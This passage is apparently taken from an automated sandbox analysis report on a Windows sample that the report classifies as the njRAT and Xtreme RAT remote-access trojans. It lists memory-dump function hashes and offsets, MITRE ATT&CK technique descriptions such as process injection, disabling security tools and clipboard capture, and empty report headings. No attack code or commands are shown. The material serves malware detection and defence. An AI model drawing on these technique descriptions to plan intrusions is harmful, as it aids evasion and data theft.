Instruction ID: da0d1230fb7e79e1ffed9e95075c3b2f35cc577335c837879d27f2be738c25d3
Opcode Fuzzy Hash: fa4a0c8e9a65d7b778e73ea02b298211c25d5c6bc66a12d98a87478b4e5d607e
Instruction Fuzzy Hash: D6F0A720A1D184DEEB549776CC597EA2FD0C715341F008869D4039A182E6A95456DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00CE05F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.559010433.0000000000CE0000.00000040.00000040.sdmp, Offset: 00CE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fb889eadce86c90271967b1c88c62c60cfed546757abdee3a37c81b3a7352c
Instruction ID: 75d3abc5d58661707cc5b4837f8f84081fc3f9d22a3d71c3326a38d597f50b17
Opcode Fuzzy Hash: 32fb889eadce86c90271967b1c88c62c60cfed546757abdee3a37c81b3a7352c
Instruction Fuzzy Hash: 9FE092766406009BD650CF0AEC45862F7D8EB84630B18C07FDC0D8B710E535B504CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 04BA0B24, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.560846130.0000000004BA0000.00000040.00000001.sdmp, Offset: 04BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b48f1cb949ce919f932bde3380620932ca953c9ae854f95d26e77c90435069
Instruction ID: ac00a05a27e3361902a4b552c84c1ccf0dad9354ba791890e89c0592e20aab09
Opcode Fuzzy Hash: 86b48f1cb949ce919f932bde3380620932ca953c9ae854f95d26e77c90435069
Instruction Fuzzy Hash: CFC04C26F4118457DF4577FEA5554ECB719DBC0229B404DB6C71A42483AE2616144162

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: System.exe PID: 6552 Parent PID: 3352 System.exeCOMMON

Executed Functions

Function 05510230, Relevance: 1.3, Instructions: 1305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.338926309.0000000005510000.00000040.00000001.sdmp, Offset: 05510000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ebecaf9ce7206d92d9165dcfa4851b7f019ee0d2d1625d791e8676ab6cdaf63
Instruction ID: 6e6d6b117b1aaa2b1a8b2ca19e1365826794feb1e08e524bd6cc26875a01151c
Opcode Fuzzy Hash: 6ebecaf9ce7206d92d9165dcfa4851b7f019ee0d2d1625d791e8676ab6cdaf63
Instruction Fuzzy Hash: 06B1D334B00200CFEB15DBB8D658A6D37A3FBC8345B154469D9029B3E4DF7A9C96CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05510222, Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.338926309.0000000005510000.00000040.00000001.sdmp, Offset: 05510000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a283bd6f326aa41ce49d8ac9e5f77e4586644f277f36e5eea29be0d0208b792
Instruction ID: 77bfba6b5602bbb3cecf6c60b75f910b693bf18c330f3ec05ab105751fcb8655
Opcode Fuzzy Hash: 0a283bd6f326aa41ce49d8ac9e5f77e4586644f277f36e5eea29be0d0208b792
Instruction Fuzzy Hash: D7B1AF34B00201CFEB19DB78D558A6E37E3FB88341B154469D902AB3E4DF7A9C92CB94

Uniqueness

Uniqueness Score: -1.00%

Function 055102CD, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.338926309.0000000005510000.00000040.00000001.sdmp, Offset: 05510000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 272ef5c1ded8cc9efb636a1082fce112bf0fe0c4e73b694d08371b2dae21046e
Instruction ID: d01d5087f7a5f8c714903c2d179d6f74c0d0a0b1a8fd53c1adef32bf7e844343
Opcode Fuzzy Hash: 272ef5c1ded8cc9efb636a1082fce112bf0fe0c4e73b694d08371b2dae21046e
Instruction Fuzzy Hash: EC918D34B00201CFE719DB78E658A6D37E3FBC8341B154469E902AB3A4DF7A9C92CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0551030F, Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.338926309.0000000005510000.00000040.00000001.sdmp, Offset: 05510000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74dd74b3afbecd93c46d34d5fc14e0f5263480449668a3ec536dc2b1f1353fb
Instruction ID: 2c3961001cbf1082ca87fb49b623143915168148702ccee65998cd1a4c82f58d
Opcode Fuzzy Hash: a74dd74b3afbecd93c46d34d5fc14e0f5263480449668a3ec536dc2b1f1353fb
Instruction Fuzzy Hash: 8B818D34B00201CFE719DB78E658A6D37A3FBC8341B158469D902AB3E4DF7A9C96CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05510006, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.338926309.0000000005510000.00000040.00000001.sdmp, Offset: 05510000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc4c982c2480981b2c47cd883abf005b474acdeb4f16852281a16d4ea979c777
Instruction ID: 22ee4f8651de421509ac3ac455333726c8520d522f2517a167f8cf1731f2eb88
Opcode Fuzzy Hash: cc4c982c2480981b2c47cd883abf005b474acdeb4f16852281a16d4ea979c777
Instruction Fuzzy Hash: CE515F305083C68FE307DB68EB9484A3FB1FF86304755859AD1408B2ABDB7C5CAACB51

Uniqueness

Uniqueness Score: -1.00%

Function 014323F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.338501804.0000000001432000.00000040.00000001.sdmp, Offset: 01432000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b2ac9a965582071819b4a68bfd92246ad2c6537d76d4f2cbfec3692b95881a3
Instruction ID: 9433cfd93320204d6b62fc6930d3d1467a3a162ccdfb34be16fdcdb7b9ad9e05
Opcode Fuzzy Hash: 3b2ac9a965582071819b4a68bfd92246ad2c6537d76d4f2cbfec3692b95881a3
Instruction Fuzzy Hash: 80D05B792056D14FD3168A1CC168F553FA4AF95704F4644FAD8008B773C364E581D200

Uniqueness

Uniqueness Score: -1.00%

Function 014323BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.338501804.0000000001432000.00000040.00000001.sdmp, Offset: 01432000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02cba60636d61f639a7548781981a4d18197049ca7e16abf28a9c819bfff062
Instruction ID: 80abd753b504ef80090bbf523ce3c37a4954bb8c4afabc91f7aa7d1a971d7f00
Opcode Fuzzy Hash: b02cba60636d61f639a7548781981a4d18197049ca7e16abf28a9c819bfff062
Instruction Fuzzy Hash: 4DD05E342402814BD716DB1CC698F5A7BD4AB85B00F0644E9AC008B372C7B5D881C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: System.exe PID: 3156 Parent PID: 3352 System.exeCOMMON

Executed Functions

Function 00F80230, Relevance: 1.3, Instructions: 1305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.356147009.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e74a59561a6c2c3d884ba0b68593742b7d53bffd92c3c94ffd9e26f2a62244
Instruction ID: 9a54397635054ec560e70d4621093533e531f9eae26b5b432312ae396f63eb67
Opcode Fuzzy Hash: 96e74a59561a6c2c3d884ba0b68593742b7d53bffd92c3c94ffd9e26f2a62244
Instruction Fuzzy Hash: C9B1B230B01200CFDB49FBB8E414BAD37A6FB88315B554869D8039B3A9DF369C56DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F80223, Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.356147009.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 095848ae3f85433b5301bc09e341eea057d90bca936592cda4cb635935dfcc48
Instruction ID: ec1b65889c3fd5b8b011d47e77daa137c445ec523ef31007be2c8954ced97894
Opcode Fuzzy Hash: 095848ae3f85433b5301bc09e341eea057d90bca936592cda4cb635935dfcc48
Instruction Fuzzy Hash: 52B1B130B01200CFDB49FBB8E454BAD37A2FB88311B554969D8039B3A9DF369C56DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F802CD, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.356147009.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74df03b3ebc8ce90ca8bf3d9cf3f949c2356030b1e1bd623434560dce3e5caed
Instruction ID: aa8805a397b2129b21669c2317a32955deb81f32a0f166cbbd2d307c9ff61860
Opcode Fuzzy Hash: 74df03b3ebc8ce90ca8bf3d9cf3f949c2356030b1e1bd623434560dce3e5caed
Instruction Fuzzy Hash: 05918230B01201CFC749FBB8E454AAD37A6FB8C3417554569D8039B3AADF3A9C56DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F8030F, Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.356147009.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae03abd11dc064e9b52f09b47533ca87e0c2e05ba858f67c15e15b5581e2a9ae
Instruction ID: 0b824ce2c29d253773eccdc19250bb1eba10275cc5d42212015f49bdfc2d6768
Opcode Fuzzy Hash: ae03abd11dc064e9b52f09b47533ca87e0c2e05ba858f67c15e15b5581e2a9ae
Instruction Fuzzy Hash: 95819030B01201CFC745FBB8E4546AD37A2EB8C341B554569D803AB3AADF3A9C57DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F80006, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.356147009.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adf337db7376ae1a10ef82c4d134778f39826bd49d45034e55f9c733d0c77d98
Instruction ID: 2912fdd3cd49c03f7641c6ddb926a50a9dbc4c78ca8e4b4ad234877fe0a300b3
Opcode Fuzzy Hash: adf337db7376ae1a10ef82c4d134778f39826bd49d45034e55f9c733d0c77d98
Instruction Fuzzy Hash: 5D516C3050A3C68FC707EB78EAA55993F71EB46204705899AC082CF1ABDB285D1BCB52

Uniqueness

Uniqueness Score: -1.00%

Function 027805CF, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.356189118.0000000002780000.00000040.00000040.sdmp, Offset: 02780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa597ee96d339eecf8103089ea85b431f34da13592120578a42a89d58a309a15
Instruction ID: 7a4399ee37f3792a62ddf9897644bba1d822a6d965a0a9edf3541de1979cd793
Opcode Fuzzy Hash: aa597ee96d339eecf8103089ea85b431f34da13592120578a42a89d58a309a15
Instruction Fuzzy Hash: 3101DBB65093805FD7128B05EC40862FFA8EF86630709C49FEC498B652D125A804CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 027805F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.356189118.0000000002780000.00000040.00000040.sdmp, Offset: 02780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebeb986236f65755b587edc02691c0ed4e5c53071492e5e65321492350d39d1d
Instruction ID: f4b3af84691cf75a8e87ab9abf5f99d05e18d34630a70df1b87ab5baba702bea
Opcode Fuzzy Hash: ebeb986236f65755b587edc02691c0ed4e5c53071492e5e65321492350d39d1d
Instruction Fuzzy Hash: 47E092766406004BD650CF0AFC41862F7D8EB88630B18C07FDC0D8B700D575B508CEA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: System.exe PID: 6872 Parent PID: 3352 System.exeCOMMON

Executed Functions

Function 00B1A454, Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00B1A4C4

Memory Dump Source

Source File: 00000014.00000002.374090903.0000000000B1A000.00000040.00000001.sdmp, Offset: 00B1A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 35fbc0af1a454be83e40a550b0c15a01823bfccc73e637aa4fb85a2df48157fa
Instruction ID: c0756d0cc1a1172d37c2e29628687bc1789add120bfd1f14371dc4577414c5ef
Opcode Fuzzy Hash: 35fbc0af1a454be83e40a550b0c15a01823bfccc73e637aa4fb85a2df48157fa
Instruction Fuzzy Hash: D131B67150A3849FD712CB18DC457A5BFE4EF12324F4880EBDD858B253D2756949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A492, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00B1A4C4

Memory Dump Source

Source File: 00000014.00000002.374090903.0000000000B1A000.00000040.00000001.sdmp, Offset: 00B1A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 48ceebf745056f746186d735d896def38ec5fad1ace953c2d6052a6d65ad25c5
Instruction ID: 178c10bcaedcb371b8183c6b7ec0b50361233a90d65a6d7b9391c7185138979b
Opcode Fuzzy Hash: 48ceebf745056f746186d735d896def38ec5fad1ace953c2d6052a6d65ad25c5
Instruction Fuzzy Hash: 9201DF715012809FDB11CF29D9897A6FBE4EF40320F18C0EADD498B742D278A448CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04A00230, Relevance: 1.3, Instructions: 1305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.374336101.0000000004A00000.00000040.00000001.sdmp, Offset: 04A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b786cc61057b62ba3f8dd49e6e6e92089c19d40d362c3155f39657522fee6f74
Instruction ID: 5b21228fdbd21abe63218783f18381d3b1d8e58db3b044dbc35829b9f8e1e2ff
Opcode Fuzzy Hash: b786cc61057b62ba3f8dd49e6e6e92089c19d40d362c3155f39657522fee6f74
Instruction Fuzzy Hash: 20B1C930700601CFC719EB78E46866D37E7AF89305B1589A9D8069F3E9EF36AC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04A00222, Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.374336101.0000000004A00000.00000040.00000001.sdmp, Offset: 04A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63ed232c42fc14b3aef6cf98d214a4a5b853627f724fd2c107277abb33797ec
Instruction ID: 6e73d949f2ccb0e2cc493fc20ae1d6e7d9a48c362447b7f4ebb3f7797638c4e2
Opcode Fuzzy Hash: d63ed232c42fc14b3aef6cf98d214a4a5b853627f724fd2c107277abb33797ec
Instruction Fuzzy Hash: 33B1C730700602CFC719EB78E45876D77E3AB89345B1585A9D806AB3E9EF36EC42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A002CD, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.374336101.0000000004A00000.00000040.00000001.sdmp, Offset: 04A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dac382b6b94a7335ceb66d67a580de9dc1e0e81b2da8f4ce59140f9f2997eac
Instruction ID: 0fcdb6d7953d2d95c6388fb761ebbb2e24891b7427e0df6e003479477912dec1
Opcode Fuzzy Hash: 7dac382b6b94a7335ceb66d67a580de9dc1e0e81b2da8f4ce59140f9f2997eac
Instruction Fuzzy Hash: EC91A930700602CFC719EB78E45866D77E3AB8974571584A9D806DB3A9EF36AC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04A0030F, Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.374336101.0000000004A00000.00000040.00000001.sdmp, Offset: 04A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f72541076f8296f96d735feec972ef10299ab7893d3d060c719d3563ec0e4e4b
Instruction ID: 32ef425b477276e26938d265f109fffe754c2fbd56c95fdb50b52ef7b4f2c993
Opcode Fuzzy Hash: f72541076f8296f96d735feec972ef10299ab7893d3d060c719d3563ec0e4e4b
Instruction Fuzzy Hash: E281A830700602CFC715EB78F46866D77E3AB89741B1585A9D806EB3B9EF36AC42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04A00006, Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.374336101.0000000004A00000.00000040.00000001.sdmp, Offset: 04A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8e8a11bcca072e039a2004200409ef70736e5e914d8ac9ca356661033b7f0e1
Instruction ID: 966c4e4fbdd0abd151d9c06b154e16b8a8ad0171a0c3cbd0551ea7f12f269f63
Opcode Fuzzy Hash: b8e8a11bcca072e039a2004200409ef70736e5e914d8ac9ca356661033b7f0e1
Instruction Fuzzy Hash: C85152305096C78FC703EB68EAA89893FB1FB8270471489DAD0448F26FEB345D4ACB55

Uniqueness

Uniqueness Score: -1.00%

Function 00BA05D0, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.374162194.0000000000BA0000.00000040.00000040.sdmp, Offset: 00BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f36abbe5bd911bfe5af4e4e3a405e48eac391810a24e1727796f5e80a44755
Instruction ID: e1dfec64a3076641fee23c152679692e1486362aba4fab4a5d7d812d4ec6b86c
Opcode Fuzzy Hash: b6f36abbe5bd911bfe5af4e4e3a405e48eac391810a24e1727796f5e80a44755
Instruction Fuzzy Hash: 080186B65093905FD7128B16DC40862FFA8EF86670709C49FEC898B652D125A908CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 00BA05F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.374162194.0000000000BA0000.00000040.00000040.sdmp, Offset: 00BA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24844050038d2082caa16cfc7da851d67ded47cc9b2f397ec408e2c546584eed
Instruction ID: dbd4dd8a9fcd161eaacd91c334f57975836523e3363d4deb38ef4680e97c3c45
Opcode Fuzzy Hash: 24844050038d2082caa16cfc7da851d67ded47cc9b2f397ec408e2c546584eed
Instruction Fuzzy Hash: C0E092B66406004BD650CF0AEC81452F7E8EB84630B18C07FDC0D8B701D535B505CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B123F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.374084552.0000000000B12000.00000040.00000001.sdmp, Offset: 00B12000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a256913b8684966511d636dafd65dc8648fd4c348c5f083f3cab5e854809c4
Instruction ID: b99d74783e5b644549aef5bbb76ba7237fc2fe5624a73fd5b95f644465c07ecf
Opcode Fuzzy Hash: 07a256913b8684966511d636dafd65dc8648fd4c348c5f083f3cab5e854809c4
Instruction Fuzzy Hash: 78D05E79205AC18FD3268B1CC2A9B953BD4EF51B04F8644F9E8008B763C368E9D1D200

Uniqueness

Uniqueness Score: -1.00%

Function 00B123BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.374084552.0000000000B12000.00000040.00000001.sdmp, Offset: 00B12000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b872b08343cb5843a46e7b098ce48b6c70e17fb2fe915eed0992cb3b4761f805
Instruction ID: 549b5558e83189ed7a9e877b5e8b13b323261ba20646172dcf02c7a3b1a3b677
Opcode Fuzzy Hash: b872b08343cb5843a46e7b098ce48b6c70e17fb2fe915eed0992cb3b4761f805
Instruction Fuzzy Hash: 65D05E342002814FC716DB0CD698F9937D4EB41B00F4644E8AC108B262C7B9DCD1D600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 7FW4ce2RDy

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Njrat

Threatname: Xtreme RAT

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Operating System Destruction:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

